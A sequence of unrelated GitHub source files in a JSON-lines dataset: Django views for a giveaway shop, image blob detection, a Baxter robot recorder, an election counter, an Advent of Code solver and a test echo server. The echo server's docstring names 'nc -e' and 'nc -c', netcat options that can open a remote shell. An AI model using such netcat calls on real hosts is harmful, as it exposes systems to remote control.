cart_items=picks.count\n\n\n if user.profile.state==None or user.profile.phone_number==8000000000:\n prof = get_object_or_404(Profile,user=request.user)\n profile_form= Profileform(instance=prof)\n return render (request, 'givers/account_update.html',{'user':user, 'profile_form':profile_form})\n return render(request,'givers/user_account.html',{'user':user,'picks':picks,'form':TransactionForm(),\n 'fit':fit,'cart_items':cart_items,'orders':orders})\n\n\n\n\n@login_required(login_url='/login/')\ndef report(request):\n user = request.user\n give=Give.objects.filter(gift_recipient=request.user.username,gift_status='redeemed')\n if len(give)==0:\n amount=''\n else:\n amt=[]\n for i in give:\n if i.gift.payment_status == 'unpaid':\n if i.gift.amount is not None:\n amt.append(i.gift.amount)\n if sum(amt)==0:\n amount=''\n else:\n amount=sum(amt,2000)\n offered = Give.objects.filter(user=user)\n picks= Give.objects.filter(gift_recipient=user,date_requested__isnull=False)\n return render(request,'givers/report.html',{'picks':picks,'amount':amount,'offered':offered})\n\n\n\n\n@login_required(login_url='/login/')\ndef logoutuser(request):\n logout(request)\n return redirect('home')\n\n\ndef loginuser(request):\n\n if request.method == 'GET':\n return render(request, 'givers/loginuser.html', {'form':AuthenticationForm(),'recaptcha_site_key':settings.GOOGLE_RECAPTCHA_SITE_KEY})\n else:\n user= authenticate(request, username=request.POST['username'],password=request.POST['password'])\n if user is None:\n messages.error(request,'Username or Password Incorrect')\n return redirect('loginuser')\n\n else:\n\n recaptcha_response = request.POST.get('g-recaptcha-response')\n print(recaptcha_response)\n data = {\n\t\t\t'secret': settings.GOOGLE_RECAPTCHA_SECRET_KEY,\n\t\t\t'response': recaptcha_response,\n\t\t\t}\n r = requests.post('https://www.google.com/recaptcha/api/siteverify', data=data)\n print(r)\n result = r.json()\n print(result)\n if result['success']:\n login(request,user)\n if request.session.get('first_login'):\n return redirect('account_update')\n return redirect('giveaway')\n messages.error(request, 'Invalid reCAPTCHA. Please try again.')\n return redirect('loginuser')\n\n\n\ndef creategift(request):\n\n if request.method == 'GET':\n return render(request,'givers/creategiving.html',{'form1':GiveawayForm()})\n\n else:\n form1=GiveawayForm(request.POST)\n if form1.is_valid():\n form1.save()\n messages.success(request,'Thank You for the thoughful gesture')\n return redirect('home')\n else:\n messages.error(request,'form is invalid')\n return render(request,'givers/creategiving.html',{'form1':GiveawayForm()})\n\n\n\ndef giveaway(request):\n user=request.user\n if user.is_anonymous:\n cartItem=''\n else:\n cartItem=Give.objects.filter(gift_recipient=user.profile.email, gift_status='requested').count\n\n gift1= Give.objects.latest('date_posted')\n query = request.GET.get('q')\n if query:\n gifts = Give.objects.filter(Q(date_requested__isnull = True)&Q(category__icontains=query)).order_by('-date_posted')\n else:\n gifts= Give.objects.filter(date_requested__isnull = True).order_by('-date_posted')\n p=Paginator(gifts,60)\n page_number=request.GET.get('page')\n try:\n page_obj=p.get_page(page_number)\n except PageNotAnInteger:\n page_obj=p.page(1)\n except EmptyPage:\n page_obj=p.page(p.num_pages)\n return render(request,'givers/giftpage.html',{'page_obj':page_obj,'user':user,'gift1':gift1,'cartItem':cartItem})\n\n\n\ndef viewgift(request,gift_id):\n user=request.user\n product = get_object_or_404(Give,pk = gift_id)\n if user.is_anonymous:\n cartItem=''\n else:\n cartItem=Give.objects.filter(gift_recipient=user.profile.email, gift_status='requested').count\n return render(request,'givers/detail_page.html',{'product':product,'cartItem':cartItem})\n\n\n\n@login_required(login_url='/login/')\ndef edit_profile(request):\n user=request.user\n prof = get_object_or_404(Profile,user=request.user)\n if request.method == 'GET':\n profile_form= Profileform(instance=prof)\n return render (request, 'givers/account_update.html',{'user':user, 'profile_form':profile_form})\n else:\n profile_form = Profileform(request.POST,request.FILES,instance=prof)\n if profile_form.is_valid():\n custom_form=profile_form.save(commit=False)\n custom_form.user=request.user\n custom_form.save()\n return redirect('user_account')\n else:\n return render(request,'givers/account_update.html',{'profile_form':profile_form,'error':'info not valid'})\n\n\n\n@login_required(login_url='/login/')\ndef add_to_cart(request,gift_id):\n user=request.user\n pick= get_object_or_404(Give,pk=gift_id)\n current_time=timezone.now()\n three_days_ago=timezone.now()-timedelta(days=3)\n month_ago=timezone.now()-timedelta(days=30)\n premium=ShoppingCart.objects.filter(shopper=str(user),status='in-cart')\n picked_within_three_days=Give.objects.filter(gift_recipient=user.profile.email,date_requested__isnull=False,date_requested__range=[three_days_ago,current_time]).count()\n picked_within_a_month=Give.objects.filter(gift_recipient=user.profile.email,date_requested__isnull=False,date_requested__range=[month_ago,current_time]).count()\n day_cap=GiveawayCap.objects.get(name='days')\n month_cap=GiveawayCap.objects.get(name='month')\n\n if request.method=='POST':\n if pick.state == user.profile.state:\n #minimize gift per user to 4 gifts in 3days\n if picked_within_three_days <= day_cap.number:\n count=0\n if pick.product_class=='premium':\n if premium:\n for i in premium:\n if i.product.product_class=='premium':\n count+=1\n if count>=1:\n messages.error(request,'only one premium item per order')\n return redirect('giveaway')\n\n pick.date_requested=timezone.now()\n pick.gift_recipient=user.profile.email\n pick.gift_status='requested'\n pick.save()\n data={\n 'shopper':user.profile.email,\n 'product':pick\n }\n ShoppingCart.objects.create(**data)\n\n\n else:\n messages.error(request,'you have already picked 4 gifts within 3days')\n return redirect('giveaway')\n else:\n messages.info(request,f'gift only available in {pick.state}')\n\n return redirect('giveaway')\n\n\n\n@login_required(login_url='/login/')\ndef delivery_options(request):\n user=request.user\n if request.method=='POST':\n if 'redeem' in request.POST:\n state=State.objects.get(name=user.profile.state)\n # city=PickupCentre.objects.filter(state=state.id)\n destination=DestinationCharge.objects.filter(state=state)\n\n return render(request,'givers/pickup_centre.html',{'destination':destination})\n\n return redirect('user_account')\n\n\n\n@login_required(login_url='/login/')\ndef returnpicked(request,gift_id):\n user=request.user\n view = get_object_or_404(Give,pk = gift_id)\n if request.method== 'POST':\n view.date_requested=None\n view.gift_recipient=''\n view.gift_status='unpicked'\n view.save(update_fields=['date_requested','gift_recipient','gift_status'])\n ShoppingCart.objects.get(shopper=user.profile.email,product=view).delete()\n return redirect('user_account')\n\n\n\n@login_required(login_url='/login/')\ndef checkout(request):\n user=request.user\n city=request.POST.get('city')\n destination=DestinationCharge.objects.get(city=city)\n products=ShoppingCart.objects.filter(shopper=user.profile.email,status='in-cart')\n if user.profile.state=='lagos':\n fit=True\n else:\n fit=False\n if request.method=='POST':\n request.session['address']=request.POST.get('address')\n request.session['contact']=request.POST.get('contact')\n\n delivery=destination.charge\n request.session['delivery']=delivery\n service=Charge.objects.get(name='standard')\n service_charge=service.charge\n amount=delivery+service_charge\n cart_items=products.count()\n tested_delivery=OnDeliveryTransaction.objects.filter(made_by=user.profile.email)\n if tested_delivery.count()>=1:\n tasted=True\n else:\n tasted=False\n return render(request,'givers/checkout.html',{'fit':fit,'amount':amount,'gifts':products,'cart_items':cart_items,'delivery':delivery,'service_charge':service_charge,'tasted':tasted})\n\n\n\n\ndef password_reset_request(request):\n\tif request.method == \"POST\":\n\t\tpassword_reset_form = PasswordResetForm(request.POST)\n\t\tif password_reset_form.is_valid():\n\t\t\tdata = password_reset_form.cleaned_data['email']\n\t\t\tassociated_users = User.objects.filter(Q(email=data)|Q(username=data))\n\t\t\tif associated_users.exists():\n\t\t\t\tfor user in associated_users:\n\t\t\t\t\tsubject = \"Password Reset Requested\"\n\t\t\t\t\tplaintext = template.loader.get_template('password/password_reset_email.txt')\n\t\t\t\t\thtmltemp = template.loader.get_template('password/password_reset_email.html')\n\t\t\t\t\tc = {\n\t\t\t\t\t\"email\":user.email,\n\t\t\t\t\t'domain':'www.giveawaynow.com.ng',\n\t\t\t\t\t'site_name': 'Giveawaynow',\n\t\t\t\t\t\"uid\": urlsafe_base64_encode(force_bytes(user.pk)),\n\t\t\t\t\t\"user\": user,\n\t\t\t\t\t'token': default_token_generator.make_token(user),\n\t\t\t\t\t'protocol': 'https',\n\t\t\t\t\t}\n\t\t\t\t\ttext_content = plaintext.render(c)\n\t\t\t\t\thtml_content = htmltemp.render(c)\n\t\t\t\t\ttry:\n\t\t\t\t\t\tmsg = EmailMultiAlternatives(subject, text_content, settings.EMAIL_HOST_USER, [user.email], headers = {'Reply-To': settings.EMAIL_HOST_USER})\n\t\t\t\t\t\tmsg.attach_alternative(html_content, \"text/html\")\n\t\t\t\t\t\tmsg.send()\n\t\t\t\t\texcept BadHeaderError:\n\t\t\t\t\t\treturn HttpResponse('Invalid header found.')\n\t\t\t\t\tmessages.info(request, \"Password reset instructions have been sent to the email address entered.\")\n\t\t\t\t\treturn redirect (\"home\")\n\n\n\tpassword_reset_form = PasswordResetForm()\n\treturn render(request,\"password/password_reset.html\",{\"password_reset_form\":password_reset_form})\n\n\ndef activate(request, uidb64, token):\n try:\n uid = urlsafe_base64_decode(uidb64)\n user = UserModel._default_manager.get(pk=uid)\n except(TypeError, ValueError, OverflowError, User.DoesNotExist):\n user = None\n if user is not None and default_token_generator.check_token(user, token):\n user.is_active = True\n user.save()\n messages.success(request,'Thank you for your email confirmation. Now you can login your account.')\n return redirect('loginuser')\n else:\n return HttpResponse('Activation link is invalid!')\n\n\n\n\n@login_required(login_url='/login/')\ndef initiate_payment(request):\n cost=request.session.get('delivery')\n delivery_address=request.session.get('address')\n contact=request.session.get('contact')\n user = request.user\n trans=Transaction()\n a,b,c=final_checkout(trans,user,cost,delivery_address,contact)\n total=a['amount']\n paystack_charge=b\n service_charge=c\n transaction=Transaction.objects.create(**a)\n\n return render(request,'givers/make_payment.html',{'transaction':transaction,'paystack_public_key':settings.PAYSTACK_PUBLIC_KEY,\n 'logistics':cost,'charge':paystack_charge,'total':total,'service_charge':service_charge})\n\n@login_required(login_url='/login/')\ndef verify_payment(request,ref):\n user=request.user\n payment = get_object_or_404(Transaction,ref=ref)\n verified = payment.verify_payment()\n\n if verified:\n ShoppingCart.objects.filter(shopper=user.profile.email,status='in-cart').update(status='ordered')\n\n give=Give.objects.filter(gift_recipient=user.profile.email,gift_status='requested')\n for i in give:\n i.gift_status='ordered'\n i.save()\n messages.success(request, 'Payment Successful,you will be contacted soon for delivery')\n else:\n messages.error(request,\"Payment Failed.\")\n return redirect('user_account')\n\n\ndef my_mail(request):\n shape=request.session.get('selected')\n if request.method=='POST':\n form=SendEmailForm(request.POST)\n if form.is_valid:\n form.save(commit=False)\n\n msg=EmailMultiAlternatives('Dashme',form.cleaned_data.get('comment'),settings.EMAIL_HOST_USER,bcc=shape)\n msg.send()\n messages.success(request,'message sent')\n del request.session['selected']\n\n return redirect('/admin/givers/profile')\n\n\n@login_required(login_url='/login/')\ndef on_delivery_payment(request):\n user=request.user\n cost=request.session.get('delivery')\n delivery_address=request.session.get('address')\n contact=request.session.get('contact')\n trans=OnDeliveryTransaction()\n a,c=final_checkout(trans,user,cost,delivery_address,contact)\n amount=a['amount']\n\n OnDeliveryTransaction.objects.create(**a)\n latest_on_delivery=OnDeliveryTransaction.objects.filter(made_by=user).latest('made_on')\n ref=latest_on_delivery.ref\n messages.success(request,'you will be contacted soon for delivery')\n plaintext = template.loader.get_template('password/invoice.txt')\n vat=0.075*c\n amount=amount+vat\n c={\n 'amount':amount,\n 'ref':ref,\n 'ordered_giveaway':a['items'],\n 'service_charge':c,\n 'logistics':cost,\n 'vat':vat\n }\n text_content = plaintext.render(c)\n\n subject = \"Giveawaynow invoice\"\n msg = text_content\n to = request.user.email\n send_mail(subject, msg, settings.EMAIL_HOST_USER, [to])\n\n ShoppingCart.objects.filter(shopper=user.profile.email,status='in-cart').update(status='ordered')\n give=Give.objects.filter(gift_recipient=user.profile.email,gift_status='requested')\n for i in give:\n i.gift_status='ordered'\n i.save()\n\n return redirect('user_account')\n\n\ndef ad_text(request):\n return render(request,'password/ads.txt')","repo_name":"Shawen17/Dashme","sub_path":"givers/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":24357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"22202742192","text":"import numpy as np\nimport cv2 as cv\nimport copy\nfrom scipy.ndimage.measurements import label\n\ndef binarise_otsu(img, b=1):\n '''\n Binarise image\n \n Parameters:\n * img: grayscale image\n \n Output:\n * binarised image\n '''\n # Get the shape (rows, cols)\n size = np.shape(img)\n size_batch = (int(size[0]/b), int(size[1]/b))\n \n for i in range(b):\n for j in range(b):\n y0 = size_batch[0] * j\n y1 = size_batch[0] * (j + 1)\n x0 = size_batch[1] * i\n x1 = size_batch[1] * (i + 1)\n crop = img[y0:y1,x0:x1]\n ret, thresh = cv.threshold(crop,0,255,cv.THRESH_OTSU)\n img[y0:y1,x0:x1] = thresh\n return img\n\ndef locate_maxima(img, k):\n '''\n Computes the local maxima through dilatation and opening\n \n Parameters:\n * img: binary image from binarisation\n * k: kernel size\n \n Returns:\n * opening: a binary image with local maxima\n \n '''\n kernel = np.ones((k,k),np.uint8)\n opening = cv.dilate(img,kernel,iterations=1)\n opening = cv.morphologyEx(opening,cv.MORPH_OPEN, kernel, iterations = 2)\n ret, opening = cv.threshold(opening,0,255,cv.THRESH_OTSU)\n return opening\n\ndef compute_k(size):\n '''\n Computes the kernel size for the maxima\n \n Standard playground size: 2560 × 1920, k0 = 17 \n Minimum: 230 x 170\n '''\n # Standard playground\n k0 = 17\n w0 = 2560\n h0 = 1920\n w_min = 450\n h_min = 340\n\n h = size[0]\n w = size[1]\n \n # If the image gives a k < 3, just return 3\n if h <= h_min and w <= w_min:\n return 3\n \n k1_1 = h * k0 / h0\n k1_2 = w * k0 / w0\n \n k1 = int((k1_1 + k1_2) / 2)\n \n # Is it even?\n if (k1 % 2) == 0:\n k1 += 1\n \n return k1\n\ndef get_bbs(labels, padding=32, min_size=16, max_size=64):\n \"\"\"\n Get the BBoxes list\n \"\"\"\n bb_list = list([])\n for i in range(1, labels[1]+1):\n # Find pixels with each car label value\n nonzero = (labels[0] == i).nonzero()\n # Identify x and y values of those pixels\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n # Define a bounding box based on min/max x and y\n if (np.max(nonzerox) - np.min(nonzerox)) >= min_size and (np.max(nonzerox) - np.min(nonzerox)) < max_size \\\n and (np.max(nonzerox) - np.min(nonzerox)) >= min_size and (np.max(nonzerox) - np.min(nonzerox))< max_size:\n bbox = ((np.min(nonzerox)-padding, np.min(nonzeroy)-padding), (np.max(nonzerox)+padding, np.max(nonzeroy)+padding))\n bb_list.append((bbox[0], bbox[1]))\n return bb_list\n\ndef compute_padding(size):\n '''\n Computes the padding size for the bboxes\n \n Standard playground size: 1280 × 960, p0 = 32\n '''\n # Reference playground\n p0 = 32\n w0 = 1280\n h0 = 960\n\n h = size[0]\n w = size[1]\n \n p1_1 = h * p0 / h0\n p1_2 = w * p0 / w0\n \n p1 = int((p1_1 + p1_2) / 2)\n \n return p1\n\ndef label_boxes(markers, size=None, padding=None):\n '''\n Draw the bounding boxes adding a padding, since the morphological\n operations makes the elements smaller than they actually are.\n\n Return the bounding boxes\n On a playground, the sizes are:\n\n padding: 32\n min_size: padding / 2\n max_size: padding * 4\n '''\n min_size_factor = 0.5\n max_size_factor = 4\n\n heat = np.zeros_like(markers[:,:]).astype(np.float) \n heat[markers == 1] = 255\n\n labels = label(heat)\n \n if size is None:\n size = np.shape(heat)\n\n if padding is None:\n padding = compute_padding(size)\n\n bb_list = get_bbs(labels, padding, padding * min_size_factor,\n padding * max_size_factor)\n \n return bb_list\n\ndef bounding_boxes(negative, size=None, padding=None):\n negative[negative == 255] = 1\n bb_list = label_boxes(negative, size, padding)\n return bb_list\n\ndef add_offset(roi, offset):\n '''\n Add the proper offset to the roi\n\n Parameters:\n * roi: bounding box referred to another bounding box\n * offset: offset of the outter bounding box\n\n Returns:\n * new roi in the global image\n '''\n p1 = (roi[0][0] + offset[0], roi[0][1] + offset[1])\n p2 = (roi[1][0] + offset[0], roi[1][1] + offset[1])\n return [p1, p2]\n\ndef detect(img, batches=2, size=None, ROI=None, padding=None):\n '''\n Performs the detection by using binarisation and thresholding. It's\n principle is based on Otsu's thresholding followed by local maxima\n detection and thresholding again to make it binary.\n \n Parameters:\n \n img: grayscale image\n ROI: Detection zone\n \n Return:\n \n bboxes\n '''\n # Select per ROI detection\n add_offset_sw = False\n offset = None\n\n if not ROI is None:\n img_roi = img[ROI[1]:ROI[3],ROI[0]:ROI[2]]\n offset = (ROI[0], ROI[1])\n add_offset_sw = True\n else:\n img_roi = img\n\n # Binarise image with otsu with 4 windows (2^2)\n otsu = binarise_otsu(img_roi, batches)\n\n if size is None:\n size = np.shape(otsu)\n\n # Locate the maxima\n k = compute_k(np.shape(otsu))\n maxima = locate_maxima(otsu, k)\n # Get the bounding boxes\n bbs = bounding_boxes(maxima, size, padding)\n\n # Add offset if needed\n if add_offset_sw:\n for i in range(len(bbs)):\n bbs[i] = add_offset(bbs[i], offset)\n return bbs\n\ndef roi_chopper(gray, bbox):\n '''\n Crops the image to get the ROI of interest for the subdetection\n\n Parameters:\n * gray: grayscale image\n * bbox: bounding box to crop\n\n Returns:\n * cropped ROI\n '''\n # Crop the image to the roi\n p1, p2 = bbox\n\n x1, y1 = p1\n x2, y2 = p2\n if x1 < 0:\n x1 = 0\n if y1 < 0:\n y1 = 0\n \n roi_gray = gray[y1:y2, x1:x2]\n return roi_gray, (x1, y1)\n\ndef detect_within_roi(gray, bbs):\n '''\n Gets new bounding boxes withing the global detections/tracking elements\n\n Parameters:\n * gray: grayscale image\n * bbs: bounding boxes to detect within the gray image\n\n Returns:\n * new bounding boxes with the proper offset\n '''\n detection_offset_bbs = []\n for bbox in bbs:\n \n roi_gray, offset = roi_chopper(gray, bbox)\n \n # Detect within roi\n if roi_gray.shape[0] == 0 or roi_gray.shape[1] == 0:\n continue\n \n size = (int(gray.shape[0] / 2), int(gray.shape[1] / 2))\n detection_bbs = detect(roi_gray, 1, size)\n for i in detection_bbs:\n detection_offset_bbs.append(add_offset(i, offset))\n \n return detection_offset_bbs\n","repo_name":"lleon95/NanoSciTracker-Python","sub_path":"src/LocalTracker/detector.py","file_name":"detector.py","file_ext":"py","file_size_in_byte":6496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"22910244604","text":"import argparse\nimport signal\n\nimport baxter_interface\nimport rospy\nimport scipy.io as sio\nimport math\n\nfrom trajectory_recorder import TrajectoryRecorder\n\nfrom robot_serving.msg import Cups\n\n_x_target = float()\n_y_target = float()\n_z_target = float()\n_stop = False\n\n\ndef signal_handler(signum, frame):\n if signum == signal.SIGINT:\n rospy.loginfo(\"Interruption from user.\")\n exit()\n elif signum == signal.SIGSEGV:\n rospy.loginfo(\"Internal error detected.\")\n raise OSError(\"Caught a SIGSEGV during execution of cup_filling_task_recording.\")\n else:\n rospy.loginfo(\"Unexpected error caught.\")\n raise OSError(\"Caught a \" + str(signal.SIGSEGV) + \" during execution of cup_filling_task_recording.\")\n\n\ndef timer_callback(event):\n global _stop\n if not _stop:\n dist = math.sqrt(math.pow(_x_target, 2) + math.pow(_y_target, 2) + math.pow(_z_target, 2))\n rospy.loginfo(\"Target Pos: (\" + str(_x_target) + \", \" + str(_y_target) + \", \" + str(_z_target) + \")\")\n rospy.loginfo(\"Dist: \" + str(dist))\n rospy.loginfo(\"\\n\\n\\n\")\n\n\ndef get_pos_callback(msg):\n if msg.cups_pos_x > 0:\n global _x_target\n global _y_target\n global _z_target\n\n _z_target = msg.cups_pos_z[0]\n _y_target = msg.cups_pos_y[0]\n _x_target = msg.cups_pos_x[0]\n\n\ndef init_ros_vars():\n # Init ROS and baxter stuff\n rospy.init_node('cup_filling_task_recording')\n rospy.loginfo('cup_filling_task_recording: init: Node initialized.')\n rospy.Subscriber('/vision_processing/cups_pub', Cups, get_pos_callback)\n rospy.Timer(rospy.Duration(2), timer_callback)\n\n\ndef init_baxter_vars():\n limbs = {'left': baxter_interface.Limb('left'),\n 'right': baxter_interface.Limb('right')}\n return limbs\n\n\ndef init_recording_vars():\n\n rec = TrajectoryRecorder('right', 100)\n return rec\n\n\ndef before_record(limbs):\n starting_position = {\n 'left': {\n 'left_s0': 0.5721748332275391,\n 'left_s1': 0.2784175126831055,\n 'left_w0': 0.13038836682128907,\n 'left_w1': 0.730558349395752,\n 'left_w2': -1.0507768385009766,\n 'left_e0': -1.047708876928711,\n 'left_e1': 2.012199296209717\n },\n 'right': {\n 'right_s0': -0.4460049135681153,\n 'right_s1': 0.03873301484985352,\n 'right_w0': -0.18292720874633792,\n 'right_w1': 0.6446554253723145,\n 'right_w2': -1.5370487477050783,\n 'right_e0': 1.5604419546936037,\n 'right_e1': 2.1698158219848636\n }\n }\n\n for limb_name, limb in limbs.items():\n limb.move_to_joint_positions(starting_position[limb_name])\n\n\ndef post_record(traj, target, output_filename):\n sio.savemat(output_filename, {'traj': traj, 'target': target}) \n \n\ndef task_recording():\n\n signal.signal(signal.SIGINT, signal_handler)\n signal.signal(signal.SIGSEGV, signal_handler)\n\n # Setup parser\n parser = argparse.ArgumentParser()\n parser.add_argument('-o', '--output',\n help='Name of output file',\n type=str,\n required=True)\n args = parser.parse_args()\n output_filename = args.output\n\n init_ros_vars()\n rospy.loginfo('\\ncup_filling_task_recording: main: Make sure gripper_control is running.')\n rospy.loginfo('Press Enter when ready.\\n')\n\n raw_input()\n limbs = init_baxter_vars()\n before_record(limbs)\n\n rospy.loginfo('\\ncup_filling_task_recording: main: Place cup in a visible and reachable position.')\n rospy.loginfo('Press Enter to continue.\\n')\n\n raw_input()\n rec = init_recording_vars()\n rospy.loginfo('\\ncup_filling_task_recording: main: Wait for target detection to be stable')\n rospy.loginfo('Press Enter to continue.\\n')\n\n raw_input()\n global _stop\n _stop = True\n target = [_x_target, _y_target, _z_target]\n trajectory = rec.record()\n\n post_record(trajectory, target, output_filename)\n\n\nif __name__ == '__main__':\n task_recording()\n","repo_name":"miguel-faria/robot-serving","sub_path":"trajectory_recording/cup_filling_task_recording.py","file_name":"cup_filling_task_recording.py","file_ext":"py","file_size_in_byte":4075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"22240813826","text":"import csv, os\r\n\r\n## this didnt run the right file when Ian and I ran from VS code...had to run it from command prompt\r\n## got differnt total number of votes in VS Code vs. command prompt (correct number in command prompt)\r\n\r\n#creating variables to import as .csv and export as .txt\r\ncsvpath = os.path.join(\"Resources\", \"PyPoll_Resources_election_data.csv\")\r\nanalyzed_data = os.path.join(\"Resources\", \"election_results2.txt\")\r\n\r\n#read in as csv file\r\nwith open(csvpath, newline='') as csvfile:\r\n csvreader = csv.reader(csvfile, delimiter=',')\r\n #print(csvreader)\r\n csv_header = next(csvreader)\r\n \r\n #Defining lists\r\n votes = []\r\n county = []\r\n\r\n candidates = []\r\n\r\n khan = []\r\n correy = []\r\n li = []\r\n otooley = []\r\n\r\n\r\n for row in csvreader:\r\n votes.append(row[0])\r\n county.append(row[1])\r\n candidates.append(row[2])\r\n\r\n #total number of votes\r\n total_votes = (len(votes))\r\n #print(total_votes)\r\n\r\n #how many votes each person won\r\n for c in candidates:\r\n if c == \"Khan\":\r\n khan.append(candidates)\r\n khan_votes = len(khan)\r\n elif c == \"Correy\":\r\n correy.append(candidates)\r\n correy_votes = len(correy)\r\n elif c == \"Li\":\r\n li.append(candidates)\r\n li_votes = len(li)\r\n else:\r\n otooley.append(candidates)\r\n otooley_votes = len(otooley)\r\n #print(khan_votes)\r\n #print(correy_votes)\r\n #print(li_votes)\r\n #print(otooley_votes)\r\n \r\n \r\n #votes received percentages\r\n khan_percent = round(((khan_votes / total_votes) * 100), 2)\r\n correy_percent = round(((correy_votes / total_votes) * 100), 2)\r\n li_percent = round(((li_votes / total_votes) * 100), 2)\r\n otooley_percent = round(((otooley_votes / total_votes) * 100), 2)\r\n #print(khan_percent)\r\n #print(correy_percent)\r\n #print(li_percent)\r\n #print(otooley_percent)\r\n \r\n #Winner \r\n if khan_percent > max(correy_percent, li_percent, otooley_percent):\r\n winner = \"Khan\"\r\n elif correy_percent > max(khan_percent, li_percent, otooley_percent):\r\n winner = \"Correy\" \r\n elif li_percent > max(correy_percent, khan_percent, otooley_percent):\r\n winner = \"Li\"\r\n else:\r\n winner = \"O'Tooley\"\r\n\r\n#Print Statements\r\n\r\nresults2 = (\r\nf\"Election Results\\n\"\r\nf\"-----------------------------------\\n\"\r\nf\"Total Votes: {total_votes}\\n\"\r\nf\"-----------------------------------\\n\"\r\nf\"Khan: {khan_percent}% ({khan_votes})\\n\"\r\nf\"Correy: {correy_percent}% ({correy_votes})\\n\"\r\nf\"Li: {li_percent}% ({li_votes})\\n\"\r\nf\"O'Tooley: {otooley_percent}% ({otooley_votes})\\n\"\r\nf\"-----------------------------------\\n\"\r\nf\"Winner: {winner}\\n\"\r\nf\"-----------------------------------\\n\"\r\n)\r\n\r\nprint(results2)\r\n\r\nwith open(analyzed_data, 'w') as txt_file:\r\n txt_file.write(results2)","repo_name":"cmc5953/python-challenge","sub_path":"python-challenge/PyPoll/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"41615702852","text":"from collections import defaultdict\nimport dataclasses\n\n# You start with 50 hit points and 500 mana points.\nyou = (50, 0, 0, 500)\n\nboss = (58, 0, 9, 0)\n\n'''\n Magic Missile costs 53 mana. It instantly does 4 damage.\n Drain costs 73 mana. It instantly does 2 damage and heals you for 2 hit points.\n Shield costs 113 mana. It starts an effect that lasts for 6 turns. While it is active, your armor is increased by 7.\n Poison costs 173 mana. It starts an effect that lasts for 6 turns. At the start of each turn while it is active, it deals the boss 3 damage.\n Recharge costs 229 mana. It starts an effect that lasts for 5 turns. At the start of each turn while it is active, it gives you 101 new mana.\n'''\n\n\ndef attack_damage(damage, armor):\n return 1 if damage <= armor else (damage - armor)\n\n@dataclasses.dataclass\nclass Effect:\n name: str\n mana_cost: int\n duration: int\n damage: int = 0\n heal: int = 0\n poison: int = 0\n armor: int = 0\n add_mana: int = 0\n\n\neffects_list = [\n Effect(name='Magic Missile', mana_cost=53, duration=1, damage=4),\n Effect(name='Drain', mana_cost=73, duration=1, damage=2, heal=2),\n Effect(name='Shield', mana_cost=113, duration=6, armor=7),\n Effect(name='Poinson', mana_cost=173, duration=6, poison=3),\n Effect(name='Recharge', mana_cost=229, duration=5, add_mana=101),\n]\nmin_mana_cost = max([e.mana_cost for e in effects_list])\neffect_names = list(sorted([e.name for e in effects_list]))\n\n# What is the least amount of mana you can spend and still win the fight?\n# (Do not include mana recharge effects as \"spending\" negative mana.)\n\n\ndef state_to_str(state):\n you, boss, _, effects = state\n es = []\n for name in effect_names:\n if name in effects:\n duration, _ = effects[name]\n es.append(f'{name}:{duration}')\n return f'{you} {boss} {\",\".join(es)}'\n\nBIG_NUM = int(1e6)\nbest_mana_cost = BIG_NUM\nstep = 0\nstate = {step: (you, boss, 0, {})}\naction = defaultdict(str)\nmemo = {}\n\n\ndef run(step):\n global state, effects_list, best_mana_cost\n print(step)\n state_str = state_to_str(state[step])\n if state_str in memo:\n return memo[state_str]\n (your_hit_points, your_damage, your_armor, your_mana), (boss_hit_points, boss_damage, boss_armor, boss_mana), mana_spent, effects = state[step]\n if mana_spent > best_mana_cost:\n return BIG_NUM\n if your_mana < min_mana_cost:\n return BIG_NUM # If you cannot afford to cast any spell, you lose.\n step += 1\n # apply old effects and drop expired\n effects = dict(effects)\n for name in list(effects.keys()):\n duration, effect = effects[name]\n boss_hit_points -= effect.poison # apply poison\n your_mana += effect.add_mana # recharge\n if duration <= 1:\n your_armor -= effect.armor\n del effects[name]\n else:\n effects[name] = (duration - 1, effect)\n # lose or win?\n if boss_hit_points <= 0:\n if best_mana_cost < mana_spent:\n print('\\n\\n\\n')\n for i in range(0, step):\n print(i, action[i])\n best_mana_cost = min(best_mana_cost, mana_spent)\n return mana_spent\n # bosses attack\n if step % 2 == 0:\n your_hit_points -= attack_damage(boss_damage, your_armor)\n if your_hit_points <= 0:\n return BIG_NUM\n state[step] = ((your_hit_points, your_damage, your_armor, your_mana), (boss_hit_points, boss_damage, boss_armor, boss_mana), mana_spent, effects)\n return run(step)\n # cast new spell\n you_win = False\n if step % 2 == 1:\n for effect in effects_list:\n effects2 = dict(effects)\n your_hit_points2, your_damage2, your_armor2, your_mana2 = your_hit_points, your_damage, your_armor, your_mana\n boss_hit_points2, boss_damage2, boss_armor2, boss_mana2 = boss_hit_points, boss_damage, boss_armor, boss_mana\n mana_spent2 = mana_spent\n if effect.name in effects: # still in effect\n continue\n action[step] = effect.name\n effects2[effect.name] = (effect.duration, effect)\n mana_spent2 += effect.mana_cost\n your_mana2 -= effect.mana_cost\n boss_hit_points2 -= attack_damage(effect.damage, 0)\n your_hit_points2 -= effect.heal\n if your_hit_points2 <= 0:\n print('\\n\\n\\n')\n for i in range(0, step):\n print(i, action[i])\n best_mana_cost = min(best_mana_cost, your_mana2)\n elif boss_hit_points2 <= 0:\n you_win = True\n else:\n you2 = your_hit_points2, your_damage2, your_armor2, your_mana2\n boss2 = boss_hit_points2, boss_damage2, boss_armor2, boss_mana2\n state[step] = (you2, boss2, mana_spent2, effects2)\n if run(step):\n you_win = True\n memo[state_str] = you_win\n return you_win\n\nrun(0)\nprint(best_mana_cost)\n\n","repo_name":"vashu1/data_snippets","sub_path":"_tasks/advent2015/d22.py","file_name":"d22.py","file_ext":"py","file_size_in_byte":5014,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"7037837595","text":"import sys\nimport socket\nimport threading\n\n\nclass NetEcho(threading.Thread):\n \"\"\" This class aims to replace 'nc -e' or 'nc -c' calls in some tests \"\"\"\n\n def __init__(self, host='localhost', port=0, echo='DEFAULT'):\n super(NetEcho, self).__init__()\n 